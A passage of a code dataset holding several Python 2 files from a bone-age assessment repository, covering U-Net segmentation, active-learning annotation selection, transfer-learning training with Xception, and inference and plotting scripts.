\"conv8_1 shape = {}\".format(conv8.get_shape())\n\n up4 = upsampling2d(conv8, 2*n_filters, k=k, s=2, name=\"up4\")\n if DEBUG_MODEL: print \"up4 before concat shape = {}\".format(up4.get_shape())\n up4 = tf.concat([up4, conv1], axis=3)\n if DEBUG_MODEL: print \"up4 concat shape = {}\".format(up4.get_shape())\n conv9 = conv2d(up4, n_filters, k=k, name=\"conv9_0\")\n bn9_0 = BatchNorm(name=\"bn9_0\")\n conv9 = bn9_0(conv9, train=is_train)\n conv9 = relu(conv9)\n if DEBUG_MODEL: print \"conv9_0 shape = {}\".format(conv9.get_shape())\n conv9 = conv2d(conv9, n_filters, k=k, name=\"conv9_1\")\n bn9_1 = BatchNorm(name=\"bn9_1\")\n conv9 = bn9_1(conv9, train=is_train)\n conv9 = relu(conv9)\n if DEBUG_MODEL: print \"conv9_1 shape = {}\".format(conv9.get_shape())\n\n outputs = conv2d(conv9, out_ch, k=1, name=\"conv10\")\n outputs = sigmoid(outputs)\n if DEBUG_MODEL: print \"outputs shape = {}\".format(outputs.get_shape())\n\n return outputs, conv9\n" }, { "alpha_fraction": 0.5851449370384216, "alphanum_fraction": 0.5985507369041443, "avg_line_length": 34.371795654296875, "blob_id": "d7f8a4099624a376690916308531424ba79a806d", "content_id": "29b8fe1b55aabcd58d63481fbad1cb99d1de260c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2760, "license_type": "no_license", "max_line_length": 99, "num_lines": 78, "path": "/paced_transfer/step6_visualize.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom utils_data import load_obj\nfrom config import *\nfrom glob import glob\n\n\ndef get_result_CTL(sex, 
exp=\"CTL\", start_layer=-1, img_size=299):\n dir = \"E{}{}_S{}_IMG_{}\".format(exp, start_layer, sex, img_size)\n print dir\n measure = load_obj(dir+\"/metric/evaluate_S{}.pkl\".format(start_layer))\n losses = load_obj(dir+\"/metric/losses_S{}.pkl\".format(start_layer))\n return losses, measure\n\n\ndef get_result_PTL(sex, exp=\"PTL\", img_size=299):\n dir = \"E{}_S{}_IMG_{}\".format(exp,sex, img_size)\n start_layers = [-1, XCEPTION_EXIT_START, XCEPTION_MID_START, XCEPTION_ENTRY_START, 0]\n losses = []\n measures = []\n for start_layer in start_layers:\n loss_file = \"{}/metric/losses_S{}.pkl\".format(dir, start_layer)\n evaluate_file = \"{}/metric/evaluate_S{}.pkl\".format(dir, start_layer)\n losses.extend(load_obj(loss_file))\n measures.append(load_obj(evaluate_file))\n\n return losses, measures\n\n\ndef plot(sex):\n start_layers = [-1, XCEPTION_EXIT_START, XCEPTION_MID_START, XCEPTION_ENTRY_START, 0]\n labels = [\"Fine-tuning From FC\", \"Fine-tuning From Exit Block\", \"Fine-tuning From Mid Block\",\n \"Fine-tuning From Entry Block\", \"Fine-tuning All Layers\", \"Paced Transfer Learning\"]\n colors = ['r', 'b', 'y', 'g', '#7e7e7e', 'm']\n if sex == 0:\n sexT = \"All\"\n elif sex == 1:\n sexT = \"Male\"\n elif sex == 2:\n sexT = \"Female\"\n\n plt.title(\"Loss on {} cohort\".format(sexT))\n plt.xlabel(\"training epochs\")\n plt.ylabel(\"loss (MAE)\")\n for i in range(5):\n losses, measures = get_result_CTL(sex=sex, exp=\"CTL\", start_layer=start_layers[i])\n print \"CTL, sex = {}, start_layer = {}, measures:{}\".format(sex, start_layers[i], measures)\n plt.plot(np.arange(250), losses, label=labels[i], color=colors[i])\n\n losses, measures = get_result_PTL(sex=sex, exp=\"PTL\")\n print \"PTL, sex = {}, measures: {}\".format(sex, measures)\n plt.plot(np.arange(250), losses, label=labels[5], color=colors[5])\n\n plt.grid(True)\n plt.grid(color='gray', linewidth='0.3', linestyle='--')\n plt.legend(loc=\"best\")\n plt.savefig(\"plot/losses_{}.png\".format(sex))\n plt.close()\n\n\nif __name__ == \"__main__\":\n \"\"\"\n start_layers = [-1, XCEPTION_EXIT_START, XCEPTION_MID_START, XCEPTION_ENTRY_START, 0]\n sexs = [\"0\", \"1\", \"2\"]\n for sex in sexs:\n for start_layer in start_layers:\n try:\n los, mea = get_result_CTL(sex=sex, exp=\"CTL\", start_layer=start_layer)\n print los\n except:\n continue\n\n losses, measures = get_result_PTL(2, exp=\"PTL\")\n print losses\n \"\"\"\n sexs = [0, 1, 2]\n for sex in sexs:\n plot(sex)\n\n" }, { "alpha_fraction": 0.6268585324287415, "alphanum_fraction": 0.6429256796836853, "avg_line_length": 29.224637985229492, "blob_id": "592ac5253eb9406741c30b0987d7a1e660ffbdba", "content_id": "5b8c290b340312c558197054392648736c8256de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4170, "license_type": "no_license", "max_line_length": 114, "num_lines": 138, "path": "/al_segmentation/utils_metrics.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import os\nimport sys\n\nfrom skimage import filters\nfrom sklearn.metrics import auc\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import roc_curve, roc_auc_score, precision_recall_curve\nfrom skimage import measure\nfrom tqdm import tqdm\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pickle\nimport matplotlib\n\n\ndef print_metrics(itr, **kargs):\n print \"*** Round {} ====> \".format(itr),\n for name, value in kargs.items():\n print (\"{} : {}, \".format(name, value)),\n print \"\"\n 
sys.stdout.flush()\n\n\ndef threshold_by_otsu(preds, flatten=True):\n # cut by otsu threshold\n threshold = filters.threshold_otsu(preds)\n pred_bin = np.zeros(preds.shape)\n pred_bin[preds >= threshold] = 1\n\n if flatten:\n return pred_bin.flatten()\n else:\n return pred_bin\n\n\"\"\"\ndef best_f1_threshold(precision, recall, thresholds):\n best_f1 = -1\n for index in range(len(precision)):\n curr_f1 = 2. * precision[index] * recall[index] / (precision[index] + recall[index])\n if best_f1 < curr_f1:\n best_f1 = curr_f1\n best_threshold = thresholds[index]\n\n return best_f1, best_threshold\n\ndef threshold_by_f1(true_vessels, generated, masks, flatten=True, f1_score=False):\n vessels_in_mask, generated_in_mask = pixel_values_in_mask(true_vessels, generated, masks)\n precision, recall, thresholds = precision_recall_curve(vessels_in_mask.flatten(), generated_in_mask.flatten(),\n pos_label=1)\n best_f1, best_threshold = best_f1_threshold(precision, recall, thresholds)\n\n pred_vessels_bin = np.zeros(generated.shape)\n pred_vessels_bin[generated >= best_threshold] = 1\n\n if flatten:\n if f1_score:\n return pred_vessels_bin[masks == 1].flatten(), best_f1\n else:\n return pred_vessels_bin[masks == 1].flatten()\n else:\n if f1_score:\n return pred_vessels_bin, best_f1\n else:\n return pred_vessels_bin\n\n\ndef dice_coefficient(true_vessels, pred_vessels, masks):\n thresholded_vessels = threshold_by_f1(true_vessels, pred_vessels, masks, flatten=False)\n\n true_vessels = true_vessels.astype(np.bool)\n thresholded_vessels = thresholded_vessels.astype(np.bool)\n\n intersection = np.count_nonzero(true_vessels & thresholded_vessels)\n\n size1 = np.count_nonzero(true_vessels)\n size2 = np.count_nonzero(thresholded_vessels)\n\n try:\n dc = 2. * intersection / float(size1 + size2)\n except ZeroDivisionError:\n dc = 0.0\n\n return dc\n\"\"\"\n\n\ndef dice_coefficient_in_train(true_vec, pred_vec):\n true_vec = true_vec.astype(np.bool)\n pred_vec = pred_vec.astype(np.bool)\n\n intersection = np.count_nonzero(true_vec & pred_vec)\n\n size1 = np.count_nonzero(true_vec)\n size2 = np.count_nonzero(pred_vec)\n\n try:\n dc = 2. * intersection / float(size1 + size2)\n except ZeroDivisionError:\n dc = 0.0\n\n return dc\n\n\ndef misc_measures_in_train(gts_vec, preds_vec):\n gts_vec = gts_vec.astype(np.bool)\n preds_vec = preds_vec.astype(np.bool)\n\n cm = confusion_matrix(gts_vec, preds_vec)\n acc = 1. * (cm[0, 0] + cm[1, 1]) / np.sum(cm)\n sensitivity = 1. * cm[1, 1] / ((cm[1, 0] + cm[1, 1]) + 1.)\n specificity = 1. 
* cm[0, 0] / ((cm[0, 1] + cm[0, 0]) + 1.)\n return acc, sensitivity, specificity\n\n\ndef metric_all_value(gts, preds):\n \"\"\"\n metric all value in training step\n :param gts: 4D array\n :param preds: 4D array\n :return:\n \"\"\"\n assert len(preds.shape) == 4\n assert len(gts.shape) == 4\n\n gts = np.squeeze(gts, axis=-1) # TO 3D array: [BATCH_SIZE, SIDE_LENGTH, SIDE_LENGTH]\n preds = np.squeeze(preds, axis=-1) # TO 3D array: [BATCH_SIZE, SIDE_LENGTH, SIDE_LENGTH]\n\n gts_vec = gts.flatten()\n preds_vec = preds.flatten()\n\n binary_preds = threshold_by_otsu(preds, flatten=False)\n binary_preds_vec = binary_preds.flatten()\n\n dice_coeff = dice_coefficient_in_train(preds_vec, binary_preds_vec)\n acc, sensitivity, specificity = misc_measures_in_train(gts_vec, binary_preds_vec)\n\n return binary_preds, dice_coeff, acc, sensitivity, specificity" }, { "alpha_fraction": 0.6263747215270996, "alphanum_fraction": 0.6450313925743103, "avg_line_length": 52.5947380065918, "blob_id": "22ba85b24305204db61ff2b101f1fdcd9c809664", "content_id": "1d90abe155fa8fc2e98ea2565e76e591cb6bb7e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10184, "license_type": "no_license", "max_line_length": 134, "num_lines": 190, "path": "/al_segmentation/step2_interactive_segmentation.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import numpy as np\nimport os\nimport argparse\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport heapq\nimport time\n\nimport utils_data\n\nfrom tqdm import tqdm\nfrom skimage.color import rgb2grey\nfrom skimage import filters\n\nfrom tf_model_discriminator import pixel_discriminator\nfrom tf_model_dense import dense_net\nfrom tf_model_unet import unet\nfrom tf_ops import dice_coef_loss, pixelwise_cross_entropy\n\nfrom utils_metrics import metric_all_value, threshold_by_otsu\nfrom config import *\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--batch_size', type=int, help=\"training batch size\", default=4)\nparser.add_argument('--init_lr', type=float, help=\"initial learning rate\", default=1E-4)\nparser.add_argument('--dice', type=float, help=\"dice coefficient loss ratio\", default=1.0)\nparser.add_argument('--pixel', type=float, help=\"pixelwise cross entropy loss ratio\", default=1.0)\nparser.add_argument('--gpu', type=int, help=\"GPU number\", default=0)\nparser.add_argument('--exp', type=str, help=\"experiment name\", default=\"interactive_segmentation\")\nFLAGS = parser.parse_args()\n\nbatch_size = FLAGS.batch_size\ndice_ratio = FLAGS.dice\npixel_ratio = FLAGS.pixel\ninit_lr = FLAGS.init_lr\ngpu = FLAGS.gpu\n\nexperiment_name = \"{}_dice{}_pixel{}_GPU{}\".format(FLAGS.exp, dice_ratio, pixel_ratio, gpu)\nimg_out_dir = \"{}/segmentation_results\".format(experiment_name)\nmodel_out_dir = \"{}/model\".format(experiment_name)\nmetrics_out_dir = \"{}/metrics\".format(experiment_name)\n\nif not os.path.isdir(img_out_dir):\n os.makedirs(img_out_dir)\nif not os.path.isdir(model_out_dir):\n os.makedirs(model_out_dir)\nif not os.path.isdir(metrics_out_dir):\n os.makedirs(metrics_out_dir)\n\n\nprint \"[x] building models on GPU: {}\".format(gpu)\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"{}\".format(gpu)\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nsess = tf.Session(config=config)\n\n# create model 0\nis_train = tf.placeholder(tf.bool)\nlearning_rate = tf.placeholder(tf.float32)\nprint \"[x] 
building Model 0\"\ntf.set_random_seed(1377)\nx_0 = tf.placeholder(tf.float32, [batch_size, IMAGE_SIZE, IMAGE_SIZE, 1], name=\"x_0\")\ny_0 = tf.placeholder(tf.float32, [batch_size, IMAGE_SIZE, IMAGE_SIZE, 1], name=\"y_0\")\ny_prob0, conv9_feature0 = unet(x_0, is_train, n_filters=32, name=\"u-net_0\")\ndice_coef_loss_0 = dice_coef_loss(y_prob0, y_0)\npixelwise_cross_entropy_0 = pixelwise_cross_entropy(y_prob0, y_0)\nloss_0 = dice_ratio * dice_coef_loss_0 + pixel_ratio * pixelwise_cross_entropy_0\ntrain_op_0 = tf.train.RMSPropOptimizer(learning_rate).minimize(loss_0)\n\nprint \"[x] building Model 1\"\ntf.set_random_seed(7988)\nx_1 = tf.placeholder(tf.float32, [batch_size, IMAGE_SIZE, IMAGE_SIZE, 1], name=\"x_1\")\ny_1 = tf.placeholder(tf.float32, [batch_size, IMAGE_SIZE, IMAGE_SIZE, 1], name=\"y_1\")\ny_prob1, conv9_feature1 = unet(x_1, is_train, n_filters=32, name=\"u-net_1\")\ndice_coef_loss_1 = dice_coef_loss(y_prob1, y_1)\npixelwise_cross_entropy_1 = pixelwise_cross_entropy(y_prob1, y_1)\nloss_1 = dice_ratio * dice_coef_loss_1 + pixel_ratio * pixelwise_cross_entropy_1\ntrain_op_1 = tf.train.RMSPropOptimizer(learning_rate).minimize(loss_1)\n\nsaver = tf.train.Saver()\nsess.run(tf.global_variables_initializer())\n\nprint \"[x] start training\"\nstep = 0\ncurrent_lr = init_lr\nlast_operator = \"a\"\nfor epoch in tqdm(range(N_TRAINING_EPOCH)):\n    print \"==================================================\"\n    print \"[x] epoch {}, training U-Net ...\".format(epoch)\n    print \"[x] epoch {}, loading training data\".format(epoch)\n    annotated_ids = utils_data.load_annotated_data_np(data_dir=RSNA_GT_NP_ANNOTATED, return_ids=True)\n    print \"[x] load annotated data ...\"\n    annotated_x, annotated_y, annotated_ids = utils_data.load_annotated_data_np(data_dir=RSNA_GT_NP_ANNOTATED, return_ids=False)\n    print \"[x] load unannotated data ...\"\n    unannotated_x, unannotated_ids = utils_data.load_unannotated_data_np(data_dir=RSNA_GT_NP_UNANNOTATED, annotated_ids=annotated_ids)\n    print \"[x] loaded annotated data: {}, unannotated data: {}\".format(annotated_x.shape[0], unannotated_x.shape[0])\n    if epoch == N_TRAINING_EPOCH/2:\n        current_lr = 0.5 * init_lr\n    if epoch == int(0.75*N_TRAINING_EPOCH):\n        current_lr = 0.25 * init_lr  # second decay step at 75% of training\n\n    shuffled_x, shuffled_y, shuffled_indexes = utils_data.shuffle_data(data_x=annotated_x, data_y=annotated_y)\n    for mini_batch in range(annotated_x.shape[0]//batch_size):\n        batch_x = shuffled_x[mini_batch*batch_size: (mini_batch+1)*batch_size]\n        batch_y = shuffled_y[mini_batch*batch_size: (mini_batch+1)*batch_size]\n        [batch_loss_0, _] = sess.run([loss_0, train_op_0],\n                                     feed_dict={x_0: batch_x, y_0: batch_y, is_train: True, learning_rate: current_lr})\n        [batch_loss_1, _] = sess.run([loss_1, train_op_1],\n                                     feed_dict={x_1: batch_x, y_1: batch_y, is_train: True, learning_rate: current_lr})\n        if step % 100 == 0:\n            print \"[--] epoch: {}, mini_batch: {}, global step: {}, loss_0: {}, loss_1: {}\". 
\\\n format(epoch, mini_batch, step, batch_loss_0, batch_loss_1)\n [batch_segmented_0] = sess.run([y_prob0], feed_dict={x_0: batch_x, is_train: False})\n [batch_segmented_1] = sess.run([y_prob1], feed_dict={x_1: batch_x, is_train: False})\n binary_preds_0, dice_coeff_0, acc_0, sensitivity_0, specificity_0 = metric_all_value(batch_y, batch_segmented_0)\n binary_preds_1, dice_coeff_1, acc_1, sensitivity_1, specificity_1 = metric_all_value(batch_y, batch_segmented_1)\n utils_data.save_obj({\"step\": step, \"batch_loss_0\": batch_loss_0, \"batch_loss_1\": batch_loss_1,\n \"dice_coeff_0\": dice_coeff_0, \"acc_0\": acc_0, \"sensitivity_0\": sensitivity_0, \"specificity_0\": specificity_0,\n \"dice_coeff_1\": dice_coeff_1, \"acc_1\": acc_1, \"sensitivity_1\": sensitivity_1, \"specificity_1\": specificity_1},\n name=metrics_out_dir+\"/step_{}_loss.pkl\".format(step))\n\n if step % 500 == 0:\n output_dir = img_out_dir + \"/step_{}\".format(step)\n if not os.path.isdir(output_dir):\n os.makedirs(output_dir)\n for i in range(batch_size):\n data_index = shuffled_indexes[mini_batch*batch_size+i]\n data_id = annotated_ids[data_index]\n plt.imsave(fname=output_dir+\"/{}_padded_ori.png\".format(data_id), arr=np.squeeze(batch_x[i], axis=2), cmap=\"gray\")\n plt.imsave(fname=output_dir+\"/{}_padded_model_0_bin.png\".format(data_id), arr=binary_preds_0[i], cmap=\"gray\")\n plt.imsave(fname=output_dir+\"/{}_padded_model_1_bin.png\".format(data_id), arr=binary_preds_1[i], cmap=\"gray\")\n plt.imsave(fname=output_dir+\"/{}_padded_bin.png\".format(data_id), arr=np.squeeze(batch_y[i], axis=2), cmap=\"gray\")\n step += 1\n\n print \"-------------------Test On Unannotated Data---------------------\"\n output_dir = img_out_dir + \"/epoch_{}\".format(epoch)\n if not os.path.isdir(output_dir):\n os.makedirs(output_dir)\n n_unannotated_data = unannotated_x.shape[0]\n selected_indexes = np.random.permutation(n_unannotated_data)[:batch_size*TEST_NUM]\n selected_data_x = unannotated_x[selected_indexes]\n for mini_batch in range(TEST_NUM):\n batch_x = selected_data_x[mini_batch*batch_size: (mini_batch+1)*batch_size]\n [model_0_prob] = sess.run([y_prob0], feed_dict={x_0: batch_x, is_train: False})\n [model_1_prob] = sess.run([y_prob1], feed_dict={x_1: batch_x, is_train: False})\n for i in range(batch_size):\n image_index = mini_batch*batch_size+i\n plt.imsave(fname=output_dir+\"/{}_ori.png\".format(image_index), arr=np.squeeze(batch_x[i]), cmap=\"gray\")\n plt.imsave(fname=output_dir+\"/{}_model_0.png\".format(image_index), arr=np.squeeze(model_0_prob[i]), cmap=\"gray\")\n plt.imsave(fname=output_dir+\"/{}_model_1.png\".format(image_index), arr=np.squeeze(model_1_prob[i]), cmap=\"gray\")\n plt.imsave(fname=output_dir+\"/{}_model_0_bin.png\".format(image_index),\n arr=threshold_by_otsu(np.squeeze(model_0_prob[i]), flatten=False), cmap=\"gray\")\n plt.imsave(fname=output_dir+\"/{}_model_1_bin.png\".format(image_index),\n arr=threshold_by_otsu(np.squeeze(model_1_prob[i]), flatten=False), cmap=\"gray\")\n\n print \"-------------Interactive Segmentation --------------------------\"\n unannotated_imgs_similarity = []\n # 1. 
Calculate each image's similarity between the two U-Net models\n    print \"[x] inference all unannotated images and calculate uncertainty ...\"\n    for mini_batch in range(unannotated_x.shape[0]//batch_size):\n        batch_x = unannotated_x[mini_batch*batch_size: (mini_batch+1)*batch_size]\n        [feature_0] = sess.run([conv9_feature0], feed_dict={x_0: batch_x, is_train: False})\n        [feature_1] = sess.run([conv9_feature1], feed_dict={x_1: batch_x, is_train: False})\n        for i in range(batch_size):\n            cosine_similarity = utils_data.similarity_cosine(feature_0[i], feature_1[i])\n            unannotated_imgs_similarity.append(cosine_similarity)\n\n    # 2. Select AL_UNCERTAINTY_NUM patches with lowest cosine similarity (uncertainty to annotate)\n    lowest_similarities = heapq.nsmallest(AL_UNCERTAINTY_NUM, unannotated_imgs_similarity)\n    ids_of_lowest_similarity = []\n    for l in lowest_similarities:\n        # cosine similarity is bounded above by 1, so every item picked by nsmallest qualifies\n        ids_of_lowest_similarity.append(unannotated_ids[unannotated_imgs_similarity.index(l)])\n\n    # 3. Ask oracle annotation\n    print \"#Epoch {}######################\".format(epoch)\n    print \"Image Ids to be annotated:\"\n    print ids_of_lowest_similarity\n\n    print \"[x] interactive waiting ...\"\n    if last_operator != \"f\":\n        operator = raw_input(\">\")\n        if operator == \"s\":\n            # save_model\n            saver.save(sess, model_out_dir+\"/model.ckpt\", global_step=step)\n        elif operator == \"f\":\n            last_operator = \"f\"\n    else:\n        saver.save(sess, model_out_dir + \"/model.ckpt\", global_step=step)\n\n" }, { "alpha_fraction": 0.681392252445221, "alphanum_fraction": 0.6934404373168945, "avg_line_length": 31.478260040283203, "blob_id": "78349f9d060df416187393c63b17c950c370a04b", "content_id": "7b46b8e854bd89ece5f6b03d71bd609b93aa5885", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 747, "license_type": "no_license", "max_line_length": 93, "num_lines": 23, "path": "/paced_transfer/step2_static.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import numpy as np\nimport argparse\n\nfrom glob import glob\nfrom utils_data import load_hdf5, load_obj\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--exp', type=str, help=\"experiment name\", default=\"regression\")\nparser.add_argument('--img_size', type=int, help=\"image size\", default=299)\nparser.add_argument('--sex', type=int, help=\"0 for all, 1 for male, 2 for female\", default=0)\nFLAGS = parser.parse_args()\n\nexp_name = FLAGS.exp\nimg_size = FLAGS.img_size\nsex = FLAGS.sex\n\nmetric_out_dir = \"E{}_S{}_IMG_{}/metric\".format(exp_name, sex, img_size)\n\nmetric_files = glob(metric_out_dir+\"/*.*\")\nfor i in range(len(metric_files)):\n    metric_file = metric_out_dir + \"/epoch_{}.pkl\".format(i+1)\n    obj = load_obj(metric_file)\n    print obj\n" }, { "alpha_fraction": 0.63756263256073, "alphanum_fraction": 0.6639409065246582, "avg_line_length": 37.68367385864258, "blob_id": "fd7c2e40166c35a2592a9e289f10e568af5f0f8d", "content_id": "0c5dadd2203dd3f82184fc4f9b2aba937d645b4a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3791, "license_type": "no_license", "max_line_length": 111, "num_lines": 98, "path": "/vallina_transfer_learning/inference.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import keras\nimport argparse\nimport os\nimport tensorflow as tf\nimport cv2\nimport numpy as np\n\nfrom pprint import pprint\nfrom keras.backend.tensorflow_backend import 
set_session\nfrom keras.applications.xception import Xception\nfrom keras.applications.inception_resnet_v2 import InceptionResNetV2\nfrom keras.applications.inception_v3 import InceptionV3\nfrom keras.layers import GlobalAveragePooling2D, Dense, Dropout\nfrom keras.models import Model\nfrom keras.models import load_model\nfrom config import *\n\n\ndef build_model(flags, model_file):\n if flags.model_name == \"inception_v3\":\n base_model = InceptionV3(input_shape=(flags.image_size, flags.image_size, 3), include_top=False,\n weights='imagenet')\n elif flags.model_name == \"inception_resnet_v2\":\n base_model = InceptionResNetV2(input_shape=(flags.image_size, flags.image_size, 3), include_top=False,\n weights='imagenet')\n elif flags.model_name == \"xception\":\n base_model = Xception(input_shape=(flags.image_size, flags.image_size, 3), include_top=False,\n weights='imagenet')\n else:\n raise NotImplementedError(\"Not a supported model: {}\".format(flags.model_name))\n\n x = base_model.output\n x = GlobalAveragePooling2D()(x)\n x = Dropout(0.5)(x)\n x = Dense(1024, activation='tanh')(x)\n x = Dropout(0.25)(x)\n x = Dense(1, activation='linear')(x)\n\n model = Model(inputs=base_model.input, outputs=x)\n\n if os.path.isfile(model_file):\n print \"[x] loading model file {}\".format(model_file)\n model.load_weights(model_file)\n\n return model\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--model_name', type=str, help=\"model name: inception_v3 ....\", default=\"inception_v3\")\n parser.add_argument('--exp', type=str, help=\"experiment name\", default=\"ENH\")\n parser.add_argument('--sex', type=int, help=\"1 for male, 2 for female\", default=1)\n parser.add_argument('--image_size', type=int, default=256)\n parser.add_argument('--gpu_id', type=int, default=0)\n parser.add_argument('--inferenced_image', type=str, default=RSNA_TRAIN_DATA+\"/1451.png\")\n FLAGS = parser.parse_args()\n\n pprint(FLAGS)\n\n print \"[x] building models on GPU {}\".format(FLAGS.gpu_id)\n\n os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"{}\".format(FLAGS.gpu_id)\n\n config = tf.ConfigProto()\n # config.gpu_options.allow_growth = True\n config.gpu_options.per_process_gpu_memory_fraction = 0.95\n set_session(tf.Session(config=config))\n\n output_path = \"E{}_M{}_S{}_I{}\".format(FLAGS.exp, FLAGS.model_name, FLAGS.sex, FLAGS.image_size)\n\n model = build_model(FLAGS, output_path+\"/weights.h5\")\n print \"build model done\"\n\n if FLAGS.model_name == \"inception_v3\":\n from keras.applications.inception_v3 import preprocess_input\n elif FLAGS.model_name == \"inception_resnet_v2\":\n from keras.applications.inception_resnet_v2 import preprocess_input\n elif FLAGS.model_name == \"xception\":\n from keras.applications.xception import preprocess_input\n else:\n raise ValueError(\"Not support {}\".format(FLAGS.model_name))\n\n print \"load image file\"\n img = cv2.imread(FLAGS.inferenced_image, cv2.IMREAD_COLOR)\n img = cv2.resize(img, (FLAGS.image_size, FLAGS.image_size))\n img = preprocess_input(np.array(img, dtype=np.float32))\n print \"image shape = {}\".format(img.shape)\n\n val = model.predict(np.expand_dims(img, 0))\n print \"->{}\".format(np.squeeze(val))\n \"\"\"\n if FLAGS.sex == 1:\n val = val * 84.2863236515 + 135.30367335\n elif FLAGS.sex == 2:\n val = val * 75.8162237968 + 117.880235376\n print \"[xxx]\" + val\n \"\"\"\n" }, { "alpha_fraction": 0.5941014289855957, "alphanum_fraction": 0.6052329540252686, "avg_line_length": 
36.72294235229492, "blob_id": "9144d4124b23b25b938dc88589a0b27bf53b1608", "content_id": "3323de5a6f16d8763aca43b1d9bff4211b15cc7b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8714, "license_type": "no_license", "max_line_length": 130, "num_lines": 231, "path": "/paced_transfer/step1_ptl_multithread.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import numpy as np\nimport argparse\nimport os\nimport pprint\nimport keras\nimport time\nimport threading\nimport tensorflow as tf\n\nfrom keras.utils import multi_gpu_model\nfrom keras import optimizers\nfrom keras.backend.tensorflow_backend import set_session\nfrom Queue import Queue\nfrom threading import Lock\n\nfrom keras.applications.xception import Xception\nfrom keras.applications.xception import preprocess_input as xception_input\n\n\nfrom keras.layers import Dense, GlobalAveragePooling2D\nfrom keras.models import Model\nfrom tqdm import tqdm\n\nfrom config import *\nfrom utils_training import _set_trainable_layers, _pprint\nfrom utils_data import save_obj\nfrom utils_data import load_sex_ids, load_data\nfrom utils_metric import regression_metric\n\n\ntrain_data_queue = Queue(maxsize=100)\ntest_data_queue = Queue(maxsize=100)\ntrain_lock = Lock()\ntest_lock = Lock()\n\ndef _build_regressor(img_size=299, num_gpu=1, start_layer=-1, model_file=None, learning_rate=1E-4):\n    input_shape = (img_size, img_size, 3)\n    if start_layer == -1:\n        base_model = Xception(input_shape=input_shape, weights=\"imagenet\", include_top=False)\n        _set_trainable_layers(base_model, len(base_model.layers))\n    else:\n        base_model = Xception(input_shape=input_shape, weights=None, include_top=False)\n        _set_trainable_layers(base_model, start_layer)\n\n    x = base_model.output\n    x = GlobalAveragePooling2D()(x)\n    predictions = Dense(1, activation=keras.activations.relu)(x)\n    model = Model(inputs=base_model.input, outputs=predictions)\n    optimizer = optimizers.RMSprop(lr=learning_rate, decay=0.95)\n    if num_gpu > 1:\n        model = multi_gpu_model(model, num_gpu)\n    print \"[x] compile model on %d GPU(s)\" % num_gpu\n\n    if model_file is not None:\n        model.load_weights(model_file)\n\n    model.compile(optimizer=optimizer, loss=\"mean_squared_error\")\n    model.summary(print_fn=_pprint)\n    return model\n\n\nclass DataLoadingThread(threading.Thread):\n    def __init__(self, *args, **kwargs):\n        # forward Thread's kwargs (e.g. name=...) passed when the workers are created in train()\n        threading.Thread.__init__(self, *args, **kwargs)\n\n    def set_data(self, queue, is_train):\n        self.queue = queue\n        self.is_train = is_train\n\n    def run(self):\n        print threading.current_thread()\n        while True:\n            if self.queue.qsize() < 100 and not self.queue.full():\n                if self.is_train:\n                    batch_x, batch_y = load_data(sex=sex, img_size=img_size, batch_size=batch_size, augment_times=7)\n                    if DEBUG_MODEL: print \"%s ask lock\" % threading.current_thread()\n                    train_lock.acquire()\n                    if DEBUG_MODEL: print \"%s acquire\" % threading.current_thread()\n                    self.queue.put({\"x\": batch_x, \"y\": batch_y})\n                    train_lock.release()\n                    if DEBUG_MODEL: print \"%s release\" % threading.current_thread()\n                else:\n                    batch_x, batch_y = load_data(sex=sex, img_size=img_size, batch_size=batch_size, augment_times=0)\n                    test_lock.acquire()\n                    self.queue.put({\"x\": batch_x, \"y\": batch_y})\n                    test_lock.release()\n\n\ndef train(n_epoch=N_TRAINING_EPOCH, img_size=299, sex=0, batch_size=16, num_gpu=1, start_layer=-1, start_epoch=0, data_thread=10):\n
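    # paced transfer schedule: the deeper into the network fine-tuning starts, the smaller the learning rate chosen below\n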
    assert start_layer in [-1, XCEPTION_EXIT_START, XCEPTION_MID_START, XCEPTION_ENTRY_START, 0]\n    assert sex in [0, 1, 2]\n    # model file path\n    if start_layer != -1:\n        model_file = model_out_dir+\"/model.h5\"\n    else:\n        model_file = None\n\n    # learning rate\n    if start_layer == -1:\n        learning_rate = 1E-3\n    elif start_layer == XCEPTION_EXIT_START:\n        learning_rate = 1E-4\n    elif start_layer == XCEPTION_MID_START:\n        learning_rate = 5E-5\n    elif start_layer == XCEPTION_ENTRY_START:\n        learning_rate = 1E-5\n    else:\n        learning_rate = 5E-6\n\n    model = _build_regressor(img_size, num_gpu, start_layer, model_file, learning_rate)\n\n    best_mae = np.inf\n    tolerance = 0\n\n    data_ids = load_sex_ids(sex)\n    for i in range(data_thread):\n        train_data_thread = DataLoadingThread(name=\"training_data_thread_{}\".format(i))\n        train_data_thread.set_data(train_data_queue, True)\n        train_data_thread.setDaemon(True)\n        train_data_thread.start()\n\n        test_data_thread = DataLoadingThread(name=\"test_data_thread_{}\".format(i))\n        test_data_thread.set_data(test_data_queue, False)\n        test_data_thread.setDaemon(True)\n        test_data_thread.start()\n\n    for epoch in 